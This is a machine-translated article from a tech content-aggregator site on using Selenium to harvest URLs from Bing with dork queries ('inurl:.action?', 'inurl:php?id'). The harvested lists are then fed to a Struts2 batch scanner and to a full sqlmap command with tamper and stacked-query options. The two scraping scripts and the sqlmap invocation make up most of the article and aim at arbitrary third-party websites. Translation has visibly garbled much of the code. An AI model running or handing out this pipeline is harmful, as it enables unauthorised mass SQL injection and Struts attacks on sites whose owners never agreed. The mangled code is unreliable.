In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-28 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
Editor to share with you how to use selenium to crawl known loopholes on the Internet. I hope you will gain something after reading this article. Let's discuss it together.
Basic knowledge of selenium
Introduction
Python is a crawler. If you crawl a static web page, the requests library is used as the request, and the bs4 and lxml libraries are used to analyze the crawled web page content.
Now the major search engines are dynamically loaded, about crawling dynamic web pages, I have learned some methods:
1. Direct url: find the api interface of js
2.webkit manually simulates js
3.scrapyjs scrapyjs acts like an adhesive and can integrate splash into scrapy.
4. Splash + docker
The combination of 5.phatomjs and selenium uses a simulation browser, which consumes a lot and is not suitable for large reptiles.
Here we use method 5, but phatomjs is no longer cp with the selenium group (you can continue to use it), and Firefox and google have also introduced headless browsers, so we use the google browser driver to achieve the goal (pay attention to the version when debugging, different versions of css and xpath selection expressions may be different)
I'm not using a headless approach, but note that it's easy to debug and we're just doing security research; if the reader wants to use it, just keep modifying it like this:
Chrome_options= Options ()
Chrome_options.add_argument ("--headless")
Driver=webdriver.Chrome (executable_path= (rusted D:\ selenium\ chrome/chromedriver.exe'), chrome_options=chrome_options)
Install selenium
Download the drive:
Https://www.cnblogs.com/freeweb/p/4568463.html
Https://www.cnblogs.com/qiezizi/p/8632058.html
Python can install the selenium library (pipinstall selenium)
You can search for some simple grammar knowledge by yourself.
FAQ of selenium
I still want to mention this point. The syntax is very simple, and the key debugging is very troublesome.
1. Unable to locate element
The problem is that the elements are taken before the web page is loaded. Originally, the first time is to set sleep (), but it will cause socket to be disconnected, so use the built-in
Importselenium.webdriver.support.ui as ui
Wait= ui.WebDriverWait (driver,20)
Printwait.until (lambda x: x.find_element_by_css_selector ("# b_results > li.b_pag > nav > ul > li:nth-child (3) > a") .text
2. Ascii coding of python
Importsys
Reload (sys)
Sys.setdefaultencoding ('utf-8')
3. Element is not in the view
What hurts the most, I've been looking for a way for a long time.
Elementnot visible appears
Simulate mouse clicks with ActionChains
Reference:
Http://www.mamicode.com/info-detail-1981462.html
4. Set the crawling target
How to write it? Let's search the international version of bing and crawl for possible vulnerabilities in struts2.
5. Write code
If you are interested in the writing process, you can study it if you are interested. The author mentions a few points here. Other grammars should be simply searched, and then turn down page by page to collect the URL of each page. The syntax selected by xpath and css here is related to your browser-driven version. Enter the browser and change the selection code (don't say it won't work, it's available for testing).
Code:
# coding=utf-8
Importsys
Reload (sys)
Sys.setdefaultencoding ('utf-8')
Importtime
Fromselenium import webdriver
Importselenium.webdriver.support.ui as ui
Fromselenium.webdriver.common.keys import Keys
Fromselenium.common.exceptions import TimeoutException
# introduce ActionChains mouse operation class
Fromselenium.webdriver.common.action_chains import ActionChains
Start_url= "https://cn.bing.com/search?q=inurl%3a.action%3f&qs=n&sp=-1&pq=inurl%3a.action%3f&sc=1-14&sk=&cvid=DBCB283FC96249E8A522340DF4740769&first=67&FORM=PERE4"
Urls=range (200)
Massif 0
S = [1, 2, 3, 4, 5, 6, 7, 8, 9]
Driver=webdriver.Chrome (executable_path= "D:/selenium/chrome/chromedriver.exe")
Wait=ui.WebDriverWait (driver,20)
Driver.get (start_url)
Forn in range (7cr 57):
Ifn%2 = = 1PUR # domestic version
ITunes 7
Else:
ITunes 8
ITunes 7
Forj in s [0:]:
Try:
# / / * [@ id= "b_results"] / li [1] / h3gama international version
# printwait.until (lambdax:x.find_element_by_xpath ('/ / * [@ id= "b_results"] / li ['+ str (j) +'] / h3gama a') .get_attribute ("href"))
# urls [m] = wait.until (lambdax:x.find_element_by_xpath ('/ * [@ id= "b_results"] / li ['+ str (j) +'] / h3gama') .get_attribute ("href"))
# domestic version
Printwait.until (lambdax:x.find_element_by_xpath ('/ html/body/div [1] / ol [1] / li ['+ str (j) +'] / h3gama') .get_attribute ("href"))
Urls [m] = wait.until (lambdax:x.find_element_by_xpath ('/ html/body/div [1] / ol [1] / li ['+ str (j) +'] / h3gama') .get_attribute ("href"))
M=m+1
ExceptException as e:
Continue
Try:
Printi
ActionChains (driver) .click (wait.until (lambdax: x.find_element_by_css_selector ("# b_results > li.b_pag > nav > ul > li:nth-child (" + str (I) + ") > a")) .perform ()
ExceptException as e:
Continue
Withopen ("urlss.txt", "a +") as f:
Forurl in urls [0:]:
F.write (str (url))
F.write ('\ n')
F.close ()
Driver.quit ()
Realize the effect
The batch tools of a company used here
Tool links:
Https://www.jb51.net/softs/574358.html
Provide a link to an open source stu tool: github's open source project, keep up with the pace, just updated 057 a few days ago
Author project address:
Https://github.com/Lucifer1993/struts-scan
The results of the test are as follows:
Supplement
Although the sql hole is difficult to find, two years ago, it is a piece of area, but now it is not good, but the author still wrote a crawl code
Goal: search for sensitive words: inurl:php?id
Code:
# coding=utf-8
Importsys
Reload (sys)
Sys.setdefaultencoding ('utf-8')
Importtime
Fromselenium import webdriver
Importselenium.webdriver.support.ui as ui
Fromselenium.webdriver.common.keys import Keys
Fromselenium.common.exceptions import TimeoutException
# introduce ActionChains mouse operation class
Fromselenium.webdriver.common.action_chains import ActionChains
Start_url= "https://cn.bing.com/search?q=inurl%3aphp%3fid%3d&qs=HS&sc=8-0&cvid=2EEF822D8FE54B6CAAA1CE0169CA5BC5&sp=1&first=53&FORM=PERE3"
Urls=range (800)
Massif 0
S = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
Driver=webdriver.Chrome (executable_path= "D:/selenium/chrome/chromedriver.exe")
Wait=ui.WebDriverWait (driver,20)
Driver.get (start_url)
Fori in range (1JI 50):
Forj in s [0:]:
Try:
Urls [m] = wait.until (lambdax:x.find_element_by_xpath ('/ * [@ id= "b_results"] / li ['+ str (j) +'] / h3gama') .get_attribute ("href"))
Printurls [m]
M=m+1
ExceptException as e:
E.message
Printi
Try:
ActionChains (driver) .click (wait.until (lambdax: x.find_element_by_css_selector ("# b_results > li.b_pag > nav > ul > li:nth-child (7) > a")) .perform ()
ExceptException as e:
Continue
Printm
Withopen ("urls.txt", "a +") as f:
Forurl in urls [0:]:
F.write (str (url))
F.write ('\ n')
F.close ()
Driver.quit ()
Test effect
Because the cycle is too long, there is no specific test, but url is crawled down, I give instructions to sqlmap
(considering shell multi-thread running sqlmap, providing ideas for reference, for the purpose of learning, there are few vulnerabilities; shell multi-thread reference: https://blog.csdn.net/bluecloudmatrix/article/details/48421577)
Sqlmap-murls.txt-- batch--delay=1.3--level=3--tamper=space2comment--dbms=mysql--technique=EUS--random-agent--is-dba--time-sec=10 | tee result.txt
Analysis command
1. Sqlmap-m specified file
2.-- delay specifies the interval time for each request requests. Default is 0.5.
3.-- level detection request header, such as source, agent, etc. Default is 1
4.-- dbms=mysql specifies that the database is mysql
5.-- technique=EUS, (without blind injection test, the cycle is already long)
B:Boolean-based blind SQL injection (Boolean injection)
E:Error-based SQL injection (error injection)
U:UNION query SQL injection (can be injected into federated queries)
S:Stacked queries SQL injection (query injection with multiple statements)
T:Time-based blind SQL injection (based on time delay injection)
6. Tee pipe commands are displayed on the screen and output to a file for our analysis.
After reading this article, I believe you have a certain understanding of "how to use selenium to crawl known loopholes on the Internet". If you want to know more about it, you are welcome to follow the industry information channel. Thank you for reading!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 271
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.